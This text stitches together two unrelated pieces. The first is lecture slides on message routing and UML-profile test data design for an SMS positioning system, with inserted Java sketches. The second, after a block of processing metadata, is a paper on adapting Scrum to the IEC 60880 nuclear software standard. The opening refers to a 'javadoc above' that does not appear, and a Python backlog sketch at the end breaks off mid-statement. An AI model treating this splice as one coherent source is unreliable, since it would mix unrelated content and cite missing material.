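Given the javadoc above, here is a hedged sketch of the adapted forward: tag each PosRequest with the session id as its messageId, and route the PosResult back by looking that id up again. PosResult/getMessageId follow the quoted javadoc and Mediator.forward follows the earlier routing snippet; everything else (Sig, sessionTable, MessageIdRouter) is invented for illustration only.

```java
import java.util.HashMap;
import java.util.Map;

// Hedged sketch of routing PosResult by messageId instead of parsing the XML result.
public class MessageIdRouterSketch {

    interface Sig { }                                   // stand-in for the signal base class

    static class PosResult implements Sig {
        private final String positioningResult;
        private final String messageId;
        PosResult(String positioningResult, String messageId) {
            this.positioningResult = positioningResult;
            this.messageId = messageId;
        }
        String getMessageId() { return messageId; }
    }

    interface Mediator { void forward(Sig sig); }

    static class MessageIdRouter {
        // messageId (chosen by us when sending the PosRequest) -> session mediator
        private final Map<String, Mediator> sessionTable = new HashMap<>();

        void register(String messageId, Mediator session) {
            sessionTable.put(messageId, session);
        }

        void forward(Sig sig) {
            if (sig instanceof PosResult) {
                // The session id is "very readily available": no XML parsing needed.
                Mediator session = sessionTable.get(((PosResult) sig).getMessageId());
                if (session != null) session.forward(sig);
            }
            // other signal types keep their old routing rules
        }
    }

    public static void main(String[] args) {
        MessageIdRouter router = new MessageIdRouter();
        router.register("STAT-ID", sig -> System.out.println("delivered to session STAT-ID"));
        router.forward(new PosResult("<POS>...</POS>", "STAT-ID"));
    }
}
```

Compared with the ICU6 version, the key used for routing is exactly the key we chose when the PosRequest was sent, so the result no longer has to be related back to the user via the positioned GSM.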
Our architecture’s routing strategy - Local addressing within the routing domain - in fact each process may only send to its own outward ports - the routing domain sets up the connections - Explicit connection to either singular parts or port, or to the (single) router - In ICU we connect to - `contr:ICUcontroller` which is the router (and a singular part) - `dataproc:Archive` which is a singular part - `SMOut:SmsOutputMediator` which is a singular port - Routing may take into account any information - but it is quite normal that the routing is done on a table where an identifier is mapped to an address - the address in our case is a port Alternative 1: The global address space - A global address space means that for the whole system - any process (or its ports) has a unique address - any such address can be reached - This is similar to the web and its URL - This presumes that - there is an underlying system of routing - with the effect that logically there is a connection between any two processes of the whole system Alternative 1: The global routing table **ICI system** - SMSin : SmsInputMediator = ARG[0], ARG[0] - SMSout : SmsOutputMediator = ARG[0], ARG[0] - from_contr : ICUcontroller - to_icuproc : StaticIDRouter - from_icuproc - to_dataproc : Dataproc : Archive Alternative 2: Multicast / broadcast Multicast meditator – sending to all in icuprocs set Another multicast port Comparison - **Alt 0: Local addressing** - local logic – but more logic through explicit connections - easy to make several instantiations - possible bottleneck at the router - **Alt 1: Global addressing** - simple logic, especially when returning answers - requires underlying routing system - more global reasoning which may mean more difficult distribution - **Alt 2: Multicast / broadcast** - no routing, the process decides for each message - simple communication - each process does a lot of futile work, but this may not be important if there are enough concurrent resources available Agile modeling and session identifier - We have used Static Id as our session identifier - This meant that the same GSM may not invoke more than one session at any point in time - Not a very tough restriction, but unnecessary and cumbersome to check - We chose Static Id as session identifier - since it was the easiest choice from a system where there were no sessions - we had not discovered the augmented features of the SMSPorts - It is typical for incremental development that - early decisions must be reviewed in light of new findings - and the system re-engineered - Here we may choose to go for unique session numbers Even More Testing with U2TP - Focusing on describing test data - what data to test Testing again – focusing on data - How to describe test data - wildcards - data pools, data partitions and data selectors - Principles for selecting data - Equivalence Class Partitioning - Boundary Value Analysis - Classification Tree Method - Preamble and Postamble Wildcards (1) – symbolic values Symbolic value The same value Another value Wildcards (2) – explaining symbolic values - Symbolic values are the same as an instance with a wildcard value - String STAT-ID = * - where the asterisk designates that the value itself is of no importance - String STAT-TR = * - another string value (not necessarily distinct from STAT-ID) - We could also have said: - Sms(message="Stud1 konto oysteinh hotpos",to="2034",from=*): - again where the asterisk designates "whatever value" - the disadvantage is that now we cannot easily refer to that value later 
- Sms("Stud1 konto oysteinh hotpos",2034,A-CGHDWQ): - this becomes almost too concrete with little to gain Testing registration - **sd testReg** - **TestComponent** - Oystein : CellPhone - **SUT** - icusystem : ICU system - "Oystein" is not a registered nickname. - STAT-ID is not a registered static id. - Sms("Stud1: konto oystein reg Oystein",2034,STAT-ID) - Sms("Reg: you are registered as Oystein",STAT-ID,2034) - {pass} - **sd testReg2** - **TestComponent** - Trine : CellPhone - **SUT** - icusystem : ICU system - "Oystein" is a registered nickname. - Sms("Stud1: konto oystein reg Oystein",2034,STAT-TR) - Sms("Reg: Nickname Oystein is already used",STAT-TR,2034) - {pass} - **sd testReg3** - **TestComponent** - Oystein : CellPhone - **SUT** - icusystem : ICU system - STAT-ID is a registered static id. - Sms("Stud1: konto oystein reg Haugen",2034,STAT-ID) - Sms("Reg: you are already registered as Oystein",STAT-ID,2034) - {pass} We need a pool of users - We need a data pool of users - where some have new nicknames and static id - some have old nicknames and new static id - some have new nicknames and old static id - some have old nicknames and old static id <table> <thead> <tr> <th>instance</th> <th>nickname</th> <th>static id</th> </tr> </thead> <tbody> <tr> <td>Oystein</td> <td>Oystein</td> <td>STAT-ID</td> </tr> <tr> <td>Trine</td> <td>Trine</td> <td>STAT-TR</td> </tr> <tr> <td>Sverre</td> <td>Sverre</td> <td>STAT-SV</td> </tr> <tr> <td>Sigurd</td> <td>Sigurd</td> <td>STAT-FS</td> </tr> </tbody> </table> How to define a data pool of Users - Dividing the user cellphones in partitions based on Nickname - This operation magically chooses from a partition The whole pool Equivalence Class Partitioning - Equivalence partitioning is based on the premise that - the inputs and outputs of a component can be partitioned into partitions that, according to the component's specification, will be treated similarly by the component. - Thus the result of testing a single value from an equivalence partition is considered representative of the complete partition - In ICU: - provided neither Oystein nor Trine has ever registered, it is of no concern which of the two users are applied for the test of registration Boundary Value Analysis - Boundary Value Analysis is based on the following premise. - Firstly, that the inputs and outputs of a component can be partitioned into partitions that, according to the component's specification, will be treated similarly by the component and, - Secondly, that developers are prone to making errors in their treatment of the boundaries of these classes. - Thus test cases are generated to exercise these boundaries. - In ICU: - There are no boundaries to name spaces - For Hotpos, the problems should occur where the distances to several hotspots are the same Classification Tree Method - As for classification-tree method, the input domain of a test object is regarded under various aspects assessed as relevant for the test. - For each aspect, disjoint and complete classifications are formed. - Classes resulting from these classifications may be further classified – even recursively. - The stepwise partition of the input domain by means of classifications is represented graphically in the form of a tree. 
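Here is a hedged sketch of how the user data pool and its partitions could look in code; the User class and the "already registered" flags are assumptions that mirror the table above, while UTP itself expresses Data Pool, Data Partition and Data Selector as model elements rather than Java.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Random;
import java.util.function.Predicate;
import java.util.stream.Collectors;

// Sketch of a data pool with partitions and a random selector.
public class UserDataPoolSketch {

    static class User {
        final String nickname; final String staticId;
        final boolean nicknameRegistered; final boolean staticIdRegistered;
        User(String nickname, String staticId, boolean nicknameRegistered, boolean staticIdRegistered) {
            this.nickname = nickname; this.staticId = staticId;
            this.nicknameRegistered = nicknameRegistered; this.staticIdRegistered = staticIdRegistered;
        }
    }

    private final List<User> pool = new ArrayList<>();   // the whole data pool
    private final Random random = new Random();

    void add(User u) { pool.add(u); }

    // A data partition is simply the subset of the pool matching a predicate.
    List<User> partition(Predicate<User> p) {
        return pool.stream().filter(p).collect(Collectors.toList());
    }

    // A data selector picks one representative; by equivalence partitioning,
    // any element of the partition is assumed to behave like the others.
    User selectFrom(Predicate<User> p) {
        List<User> part = partition(p);
        return part.get(random.nextInt(part.size()));    // assumes the partition is non-empty
    }

    public static void main(String[] args) {
        UserDataPoolSketch poolSketch = new UserDataPoolSketch();
        poolSketch.add(new User("Oystein", "STAT-ID", false, false));  // new nickname, new id
        poolSketch.add(new User("Trine",   "STAT-TR", true,  false));  // old nickname, new id
        poolSketch.add(new User("Sverre",  "STAT-SV", false, true));   // new nickname, old id
        poolSketch.add(new User("Sigurd",  "STAT-FS", true,  true));   // old nickname, old id

        User candidate = poolSketch.selectFrom(u -> !u.nicknameRegistered && !u.staticIdRegistered);
        System.out.println("registration test uses: " + candidate.nickname);
    }
}
```

Boundary value analysis would add selectors that deliberately pick elements at the edges of a partition, but as noted above there are no such boundaries in the ICU name spaces.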
Testing registration <sut> Oystein : CellPhone {"Oystein" is a registered nickname} Sms("Stud1 konto oystein reg Oystein",2034,STAT-ID) Sms("Reg: Nickname Oystein is already used",STAT-TR,2034) {pass} </sut> <sut> Oystein : CellPhone {"Oystein" is not a registered nickname} Sms("Stud1 konto oystein reg Oystein",2034,STAT-ID) Sms("Reg: you are registered as Oystein",STAT-ID,2034) {pass} </sut> <sut> Oystein : CellPhone {"STAT-ID" is not a registered static ID} Sms("Stud1 konto oystein reg Oystein",2034,STAT-ID) Sms("Reg: you are already registered as Oystein",STAT-ID,2034) {pass} </sut> ICU registration classification tree Registration nickname - exists - new static id of sender - exists - new testReg testReg2 testReg3 Preamble and Postamble - A test preamble is a description of how to get the test system into a situation where the next test can be executed - A test postamble is a description of how to clean-up after the test - A combined test may often be done such that the tests normally make up each others preamble - TestReg will make CellPhone(Oystein,STAT-ID) registered - TestReg2 or TestReg3 have then their preconditions satisfied hotpos [nickname] ICU *hotpos* classification tree ``` hotpos nick / \ | | | | nickname static id of sender exists new exists new ``` error sms (?) normal error sms **Is this intended?** Unintended cases: the positioning stranger - The systematic testing reveals: - A complete stranger may position any one registered as long as he/she knows their nickname - What was the real intention behind registration? - That the ones inside can see others inside - Not that anybody can see the insiders and nobody can see the outsiders! - Remedy: Only registered users can position others - Systematic testing reveals - not only errors in the design and the implementation - but also problems with the requirements - there were inconclusive traces that should have been negative Summary Data-oriented Testing - Not every possible data combination can be tested - Therefore we need to group the data - such that the values in a group can be considered equal - Apply analysis to form the value groups - Equivalence Class Partitioning - Boundary Value Analysis - Classification Tree Method - Any systematic approach will be better than nothing! - UML Testing Profile offers the following concepts: - Data Pool - Data Partition - Data Selector
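As a closing illustration of the preamble/postamble idea above, here is a hedged sketch in plain Java: the preamble puts the system into the state the test needs (Oystein already registered, as testReg would leave it), and the postamble cleans up. The RegistrationStore class is a stand-in for the ICU registration state, not real ICU code.

```java
import java.util.HashMap;
import java.util.Map;

// Sketch of preamble/postamble around a test case. In a real test the preamble would
// drive the SUT through its normal interface (e.g. by running testReg first).
public class PreamblePostambleSketch {

    static class RegistrationStore {
        final Map<String, String> nicknameToStaticId = new HashMap<>();
    }

    static void preamble(RegistrationStore store) {
        // Establish the precondition for testReg2/testReg3: "Oystein" is already registered.
        store.nicknameToStaticId.put("Oystein", "STAT-ID");
    }

    static boolean testReg2(RegistrationStore store) {
        // Attempt to register the same nickname again; expect it to be reported as taken.
        return store.nicknameToStaticId.containsKey("Oystein");   // verdict: pass when true
    }

    static void postamble(RegistrationStore store) {
        // Clean up so the next test starts from a known, empty state.
        store.nicknameToStaticId.clear();
    }

    public static void main(String[] args) {
        RegistrationStore store = new RegistrationStore();
        preamble(store);
        System.out.println(testReg2(store) ? "pass" : "fail");
        postamble(store);
    }
}
```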
{"Source-Url": "https://www.uio.no/studier/emner/matnat/ifi/INF5150/h09/undervisningsmateriale/infuit-modeling4-091113.pdf", "len_cl100k_base": 5473, "olmocr-version": "0.1.50", "pdf-total-pages": 69, "total-fallback-pages": 0, "total-input-tokens": 87217, "total-output-tokens": 8033, "length": "2e12", "weborganizer": {"__label__adult": 0.00036263465881347656, "__label__art_design": 0.00032329559326171875, "__label__crime_law": 0.00023508071899414065, "__label__education_jobs": 0.0008597373962402344, "__label__entertainment": 5.269050598144531e-05, "__label__fashion_beauty": 0.00013387203216552734, "__label__finance_business": 0.00013267993927001953, "__label__food_dining": 0.00023758411407470703, "__label__games": 0.0005812644958496094, "__label__hardware": 0.0004839897155761719, "__label__health": 0.0002944469451904297, "__label__history": 0.00014603137969970703, "__label__home_hobbies": 5.924701690673828e-05, "__label__industrial": 0.0002474784851074219, "__label__literature": 0.0002982616424560547, "__label__politics": 0.00015485286712646484, "__label__religion": 0.00038695335388183594, "__label__science_tech": 0.004779815673828125, "__label__social_life": 9.429454803466796e-05, "__label__software": 0.00457000732421875, "__label__software_dev": 0.98486328125, "__label__sports_fitness": 0.00028634071350097656, "__label__transportation": 0.0003390312194824219, "__label__travel": 0.00017821788787841797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 22686, 0.00746]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 22686, 0.41651]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 22686, 0.82865]], "google_gemma-3-12b-it_contains_pii": [[0, 98, false], [98, 415, null], [415, 750, null], [750, 1119, null], [1119, 1650, null], [1650, 3602, null], [3602, 3743, null], [3743, 3983, null], [3983, 4112, null], [4112, 4516, null], [4516, 4991, null], [4991, 5088, null], [5088, 5104, null], [5104, 5400, null], [5400, 5520, null], [5520, 6281, null], [6281, 6611, null], [6611, 6700, null], [6700, 6947, null], [6947, 7061, null], [7061, 7061, null], [7061, 7125, null], [7125, 7774, null], [7774, 8133, null], [8133, 8202, null], [8202, 8273, null], [8273, 8332, null], [8332, 8752, null], [8752, 8904, null], [8904, 8933, null], [8933, 9498, null], [9498, 9535, null], [9535, 9852, null], [9852, 9955, null], [9955, 10216, null], [10216, 10298, null], [10298, 10589, null], [10589, 11048, null], [11048, 11646, null], [11646, 12176, null], [12176, 12617, null], [12617, 12617, null], [12617, 12635, null], [12635, 12711, null], [12711, 12809, null], [12809, 13307, null], [13307, 13981, null], [13981, 14377, null], [14377, 14633, null], [14633, 14748, null], [14748, 15361, null], [15361, 16005, null], [16005, 16088, null], [16088, 16368, null], [16368, 16447, null], [16447, 17093, null], [17093, 17992, null], [17992, 18451, null], [18451, 18618, null], [18618, 19162, null], [19162, 19759, null], [19759, 20217, null], [20217, 20828, null], [20828, 20969, null], [20969, 21400, null], [21400, 21418, null], [21418, 21610, null], [21610, 22211, null], [22211, 22686, null]], "google_gemma-3-12b-it_is_public_document": [[0, 98, true], [98, 415, null], [415, 750, null], [750, 1119, null], [1119, 1650, null], [1650, 3602, null], [3602, 3743, null], [3743, 3983, null], [3983, 4112, null], [4112, 4516, null], [4516, 4991, null], [4991, 5088, null], [5088, 5104, null], [5104, 5400, null], 
[5400, 5520, null], [5520, 6281, null], [6281, 6611, null], [6611, 6700, null], [6700, 6947, null], [6947, 7061, null], [7061, 7061, null], [7061, 7125, null], [7125, 7774, null], [7774, 8133, null], [8133, 8202, null], [8202, 8273, null], [8273, 8332, null], [8332, 8752, null], [8752, 8904, null], [8904, 8933, null], [8933, 9498, null], [9498, 9535, null], [9535, 9852, null], [9852, 9955, null], [9955, 10216, null], [10216, 10298, null], [10298, 10589, null], [10589, 11048, null], [11048, 11646, null], [11646, 12176, null], [12176, 12617, null], [12617, 12617, null], [12617, 12635, null], [12635, 12711, null], [12711, 12809, null], [12809, 13307, null], [13307, 13981, null], [13981, 14377, null], [14377, 14633, null], [14633, 14748, null], [14748, 15361, null], [15361, 16005, null], [16005, 16088, null], [16088, 16368, null], [16368, 16447, null], [16447, 17093, null], [17093, 17992, null], [17992, 18451, null], [18451, 18618, null], [18618, 19162, null], [19162, 19759, null], [19759, 20217, null], [20217, 20828, null], [20828, 20969, null], [20969, 21400, null], [21400, 21418, null], [21418, 21610, null], [21610, 22211, null], [22211, 22686, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, true], [5000, 22686, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 22686, null]], "pdf_page_numbers": [[0, 98, 1], [98, 415, 2], [415, 750, 3], [750, 1119, 4], [1119, 1650, 5], [1650, 3602, 6], [3602, 3743, 7], [3743, 3983, 8], [3983, 4112, 9], [4112, 4516, 10], [4516, 4991, 11], [4991, 5088, 12], [5088, 5104, 13], [5104, 5400, 14], [5400, 5520, 15], [5520, 6281, 16], [6281, 6611, 17], [6611, 6700, 18], [6700, 6947, 19], [6947, 7061, 20], [7061, 7061, 21], [7061, 7125, 22], [7125, 7774, 23], [7774, 8133, 24], [8133, 8202, 25], [8202, 8273, 26], [8273, 8332, 27], [8332, 8752, 28], [8752, 8904, 29], [8904, 8933, 30], [8933, 9498, 31], [9498, 9535, 32], [9535, 9852, 33], [9852, 9955, 34], [9955, 10216, 35], [10216, 10298, 36], [10298, 10589, 37], [10589, 11048, 38], [11048, 11646, 39], [11646, 12176, 40], [12176, 12617, 41], [12617, 12617, 42], [12617, 12635, 43], [12635, 12711, 44], [12711, 12809, 45], [12809, 13307, 46], [13307, 13981, 47], [13981, 14377, 48], [14377, 14633, 49], [14633, 14748, 50], [14748, 15361, 51], [15361, 16005, 52], [16005, 16088, 53], [16088, 16368, 54], [16368, 16447, 55], [16447, 17093, 56], [17093, 17992, 57], [17992, 18451, 58], [18451, 18618, 59], [18618, 19162, 60], [19162, 19759, 61], [19759, 20217, 62], [20217, 20828, 63], [20828, 20969, 64], [20969, 21400, 65], [21400, 21418, 66], [21418, 21610, 67], [21610, 22211, 68], [22211, 22686, 69]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 22686, 0.02778]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
50bd8ab290737b1cd43a53ec6c47fec0ad3e83c7
Scrum and IEC 60880 Tor Stålhane Norwegian University of Science and Technology +47 73594484, stalhane@idi.ntnu.no Vikash Katta Norwegian University of Science and Technology and OECD Halden Reactor Project, +47 45464323, vikash.katta@hrp.no Thor Myklebust SINTEF ICT +47 95779869, thor.myklebust@sintef.no Abstract Agile development has already proven to be a big success in several areas of application. It started in areas like web development but has now even moved into safety critical domains – e.g. air traffic management, automotive. Companies working with industrial automation – e.g. ABB – are considering using an agile development process. The main reason for this is that requirements changes are more frequent than before plus acceptance of the fact that requirements seldom are finished when the application development starts. To quote Daniel M. Barry “…it might be that the only solution is to identify requirements, to carry out a design sufficient to get a black-box description of the system, to identify and analyse hazards, and then to begin the lifecycle again with changed requirements”. NTNU – IDI has, together with SINTEF ICT, defined a process called Safe Scrum plus a process to handle the challenges posed by relevant standards. This process has already been applied to agile development using ISO 9001 and IEC 61508. For the proposed paper we will apply the same process to the standard IEC 60880 which is used in the nuclear power plant domain. Important issues discussed in the proposed paper will be documentation, planning and proof of conformance. These three areas are important in the development of all software that shall be certified. In addition, they are the three areas where agile and plan-driven development is most different. 1. Introduction Agile development is an idea, not a method. It is summed up in the agile manifesto as follows: - Individuals and interactions over processes and tools - Working software over comprehensive documentation - Customer collaboration over contract negotiation - Responding to change over following a plan That is, while there is value in the items on the right, we value the items on the left more. The agile movement can be seen as a reaction to the strong focus on documents and plans that was, and in many cases, still is prevailing in software development organizations. Many developers saw this as a straight-jacket and that it focused on fulfilling the plans at the expense of satisfying the customers. 2. What is Agile development and what is Scrum There is no such thing as “The agile development process”. People who implement the agile manifesto have met this challenge in different ways. Examples of processes are XP, Lean Software development and Scrum. Based on what we have seen in industry we will focus on Scrum since this method already has been implemented or is about to be implemented in several large companies – also in the safety critical area. The standard Scrum process is shown in figure 1. Avinor and Autronica already use Scrum in safety-critical application development while ABB is starting to consider it. In addition, several companies are evaluating Scrum for possible, later implementation. There are two main views on agile development - the believers’ view and the sceptics’ view. The following list is taken from a presentation by Geir K. Hanssen [1] and the items are summarized below. 
- The believers: - Agile development is cheaper because: - Only what is needed will be developed - Misunderstandings and errors are discovered early - Communication is more efficient - Better conditions for creativity - Changes cannot be controlled. Thus, it is better to emphasize change responses and change control - Self-organizing groups perform better - The sceptics - Customer attention is luxury - Customer will not accept "no plan – no estimates" - Small releases will only fit small problems and small projects - Agile development does not fit in traditional project management framework - Compliance with important standards such as IEC 61508 The Scrum process is one way to realize an agile process. The process is described by a Scrum process, a set of artefacts and three roles - see [1]. - The Scrum process - The Sprint planning meeting – select requirements for the next sprint - Sprints – also called iterations, where the implementation and testing is done. A sprint most often takes one week to one month. The work in each sprint can be viewed as a mini-waterfall development project. - The daily Scrum meetings – what did we do yesterday, which problems did we encounter and what will we do today? - Sprint review meetings. What did we achieve in this sprint, showing real, working code? - Sprint retrospectives – what went well in the previous sprint and what should be improved? How shall we change the process to realize the improvements? - Artefacts - The product backlog – the requirements that have been identified but not yet implemented - Sprint backlog – the requirements to be implemented in the coming sprint - The wall – a set of charts (e.g. the burn-down chart) showing the current project status. - Roles Product owner – customer representative Scrum team – those who do detailed design and coding. The team typically consists of five to ten persons who work full time on the project Scrum master – “project manager”. His main jobs are to facilitate development and to remove impediments 3. Why should the Safety-Critical Industry consider Scrum The part of the industry that develops safety-critical software has for a long time been plan-driven and methodically conservative. Several changes in the environment have, however, affected this: - The tempo with which new technology is introduced in the marketplace. This holds both for new products (what we develop) and for new components (what we uses) – e.g. sensors. - Increased focus on flexibility. This is partly a consequence of the first bullet point. - There is a growing realization that the plan-driven development paradigm is too much focussed on writing and rewriting plans that are not used and on producing documents that are not read. - The industry’s general focus on lean development and production. Whatever that does not contribute to the product’s final value should be removed. There is no reason to believe that the tempo of inventions and innovations will slow down and those who do not follow will quickly get into trouble. In addition, more and more developers are using agile development. It remains to be seen if these programmers will be interested in working in a development environment based on plan- and document-driven development methods. To quote from our IEC 61508 paper [2], the key benefits that comes from this combination of a safety-oriented approach and a process model for agile software development are that the process enables - Continuous feedback both to the customer, the development team and the independent test team. 
- Re-planning, based on the most recent understanding of the requirements and the system under development.
- Mapping of functional and safety requirements.
- Code-requirements traceability.
- Coordination of work and responsibilities between the three key roles: the development team, the customer and the assessor.
- Test-driven development of safety-critical systems.

All of these points will help us to get a more visible process and thus better control over the development process, which in turn will help us to deliver on time and within budget.

4. Challenges when using Scrum

First and foremost – Scrum is a software development method. As a consequence, we need to single out software development as a separate activity. This does not mean that the software should be developed in isolation from the rest of the project, but that it should be organized as a separate activity.

The nuclear industry, and any other industry that depends on safe operation of complex control systems, will have one or more standards that shall help the industry in focussing on and achieving safe operation. These standards, however, mirror a traditional, plan- and document-driven view on software development. Changing these standards to also accommodate the agile development paradigm will take considerable time – e.g. five to ten years. There is also a real risk that changes in software development paradigms will outrun the standards' ability to incorporate such changes. Thus, in order to start using an agile development method – in this case Scrum – we need to explore two options:

- Changes to Scrum – e.g. add-ons to cater to the traceability requirements
- Alternative interpretations of requirements in the applicable standards – e.g. what should be accepted as proof of conformance for an activity?

Both approaches are useful. The first and third authors have used both of them successfully in two cases – (1) Scrum and ISO 9001 [3] and (2) Scrum and IEC 61508 [2] – and we will use parts of both options later in this paper.

5. A Method for Scrum adoption

We present a method for adapting Scrum to the needs of safety system development. This method was used in [2] and [3]; it is simple, and our experience so far is that it is highly efficient.

1. Collect a team containing a software expert, a domain expert and an assessor for the standard(s) under consideration
2. Identify all requirements in the standard related to software development
3. Go through all the requirements, asking the question "Will this requirement be fulfilled if we use Scrum?" This assigns each requirement to one of the following categories:
   a. Is fulfilled even if we use Scrum as is
   b. Is partly fulfilled if we use Scrum as is; extra activities will need to be added to the Scrum process
   c. Cannot be met if we use Scrum as is
4. Use the two strategies identified in section 4 to sort out the problems – the non-compliances

This approach leaves us with two challenges: (1) have we identified all relevant requirements, and (2) different assessors have different opinions of what should count as proof of conformance. Challenge (2) is especially problematic since it has no final solution. One possible way out is to involve the assessor from day one and ask questions such as "If we use approach X here, will this be accepted?" This approach must, however, be used with care so that we do not hold the assessor hostage to our choice of development process.
If we need to ensure assessor independence, we can use one assessor as a "sparring partner" during the project and another one – preferably from the same organization – for certification.

6. IEC 60880 and Scrum

6.1 Relevant standard requirements

We have taken sections 5 to 10 of IEC 60880 [4] as our main starting point. In addition, we have consulted IEC 62138 [5] and tables 2 and 3, section 1.11 in the document "Licensing of safety critical software for nuclear reactors" for guidance. From the diagram below, taken from IEC 60880, we see that the software implementation concerns only a small part of the total process. It is only this part that is touched by Safe Scrum; the rest is Scrum independent.

![Figure 2: Activities in the system safety life cycle](image)

We studied sections 5 to 10 of IEC 60880 in detail. Based on the requirements stated in these sections, we selected the following areas for closer scrutiny:

- **5.3 – Software development approach.** This section has no references to processes or procedures and is thus, by default, also applicable to Scrum.
- **5.4 – Software project management.** In this section, the standard states that the development process may be iterative, provided that certain requirements in clause 6 of IEC 61513 [8] are fulfilled. This part of IEC 61513 places requirements on the system safety lifecycle, which have to be fulfilled outside Scrum. In addition, sub-section 5.4.9 states that each phase should generate a set of documents according to annex F of this standard.
- **5.5 – Software quality assurance plan,** which also includes security assurance and safety assurance. This section says that a quality assurance plan should exist. This plan may, however, be "adapted for individual product phases or particular software components…provided the principles defined in this standard are addressed", and "Any deviation from the requirements of this standard and its normative annexes shall be identified and justified". Thus, it is up to the assessor what he is willing to accept. It is practical to have a company QA plan which can be reused, in whole or in part, from one project to the next. In addition, other company-specific standards will influence our solution.
- **7 – Design and implementation.** The most important provisions in this section are that there should be (1) a program structure based on decomposition, (2) that this structure should be simple to understand, (3) that a top-down approach should be preferred to a bottom-up solution, and (4) that a conceptual model of the software architecture should be adopted at the beginning of each software project. In addition, the two clauses 7.1.2 and 7.1.3 are discussed in some more detail below – see sections 6.2 and 7.2.

Since Scrum and all other agile methods are specifically made to handle problems related to the specification and changing of requirements, section 6 is an important part of the standard when we want to adapt to agile development. We have thus selected 6.1 – Specification of software requirements – for a closer look. As a consequence of the reference to annex F in IEC 60880, we also include sections 8.2.2 and 8.2.3 for a closer look.

6.2 A closer look

We have singled out the following sections of the standard for a closer look:

- 5.4 – Software project management
  - 9 requirements are OK
  - 2 requirements need a closer look – 5.4.9, which invokes annex F, and 5.4.10
- 6.1 – Specification of software requirements
  - 13 requirements are OK
  - 2 requirements need a closer look – 6.1.4 and 6.1.5, which invoke annex A
- 7.1.2 – Implementation of new software in general-purpose languages
  - 4 requirements are OK
  - 1 requirement needs a closer look – 7.1.2.5, which invokes annex B
- 7.1.3 – Implementation of new software in application-oriented languages
  - 4 requirements are OK
  - 0 need a closer look
- 8.2.2 – Design verification
  - 7 requirements are OK
  - 0 need a closer look
- 8.2.3 – Implementation verification
  - 11 requirements are OK
  - 1 requirement needs a closer look – the introduction, which invokes table E.4.2

This gives us a to-do list of six requirements. The remaining 48 requirements do not need any special treatment or consideration when we use Scrum; in other words, 11% of the requirements need a closer look. To put these numbers into perspective, we had to take a closer look at 15 of 183 requirements – 8% – when assessing Scrum for IEC 61508. We found no requirements in the standard that definitely could not fit into the Scrum process.

7. A workable solution

7.1 Safe Scrum

We have observed that the safety requirements are quite stable, while the functional requirements can change considerably over time. The most important sources of changes to safety requirements are changes in relevant standards, which happen only seldom, and the discovery of new hazards during RAMS (Reliability, Availability, Maintainability and Safety) validation. This is taken care of in Safe Scrum with the possibility of revising the backlog after RAMS validation – see figure 3 below. Development with a high probability of changes to requirements will favour an agile approach.

Usually, each backlog item also indicates the estimated amount of resources needed to complete the item – for instance the number of developer work hours. These estimates can be developed using simple group-based techniques like 'planning poker', which is a popularized version of wideband Delphi [6].

All the risk and safety analyses on the system level are done outside the Safe Scrum process, including the analysis needed to decide the safety level. Software is considered during the initial risk analysis and in all the later analyses – one per iteration. Just as for testing, safety analysis also improves when it is done iteratively and for small increments – see [7].

Due to the focus on safety requirements, we propose to use two product backlogs: one functional product backlog, which is typical for Scrum projects, and one safety product backlog, which is used to handle safety requirements. Adding a second backlog is an extension of the original Scrum process and is needed to separate the frequently changed functional requirements from the more stable safety requirements. With two backlogs we can keep track of how each item in the functional product backlog relates to the items in the safety product backlog, i.e. which safety requirements are affected by which functional requirements. This can be done by using simple cross-references in the two backlogs and can also be supported by an explanation of how the requirements are related, if this is needed to fully understand a requirement. A small illustrative sketch of such cross-referencing is given after Figure 3.

Figure 3: Safe Scrum process
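Neither Scrum nor IEC 60880 prescribes how the two backlogs and their cross-references are represented. Purely as an illustration of the idea, and not as part of the Safe Scrum definition, the following Python sketch keeps the functional and safety backlogs linked so that the safety requirements affected by a changed functional requirement can be traced; all names, fields and example items are hypothetical.

```python
# Illustrative sketch only: one possible representation of the two Safe Scrum
# backlogs and their cross-references. Names and fields are hypothetical and
# are not prescribed by IEC 60880 or by Scrum.
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class SafetyRequirement:
    req_id: str
    text: str


@dataclass
class FunctionalRequirement:
    req_id: str
    text: str
    estimate_hours: int
    related_safety_ids: List[str] = field(default_factory=list)  # cross-references


class ProductBacklogs:
    """Functional product backlog plus the separate safety product backlog."""

    def __init__(self) -> None:
        self.safety: Dict[str, SafetyRequirement] = {}
        self.functional: Dict[str, FunctionalRequirement] = {}

    def add_safety(self, item: SafetyRequirement) -> None:
        self.safety[item.req_id] = item

    def add_functional(self, item: FunctionalRequirement) -> None:
        # Reject dangling cross-references so traceability is preserved.
        for sid in item.related_safety_ids:
            if sid not in self.safety:
                raise ValueError(f"Unknown safety requirement: {sid}")
        self.functional[item.req_id] = item

    def affected_safety_requirements(self, functional_id: str) -> List[SafetyRequirement]:
        """Which safety requirements are touched if this functional item changes?"""
        item = self.functional[functional_id]
        return [self.safety[sid] for sid in item.related_safety_ids]


if __name__ == "__main__":
    backlogs = ProductBacklogs()
    backlogs.add_safety(SafetyRequirement("S-1", "Self-supervision of the I/O module"))
    backlogs.add_functional(
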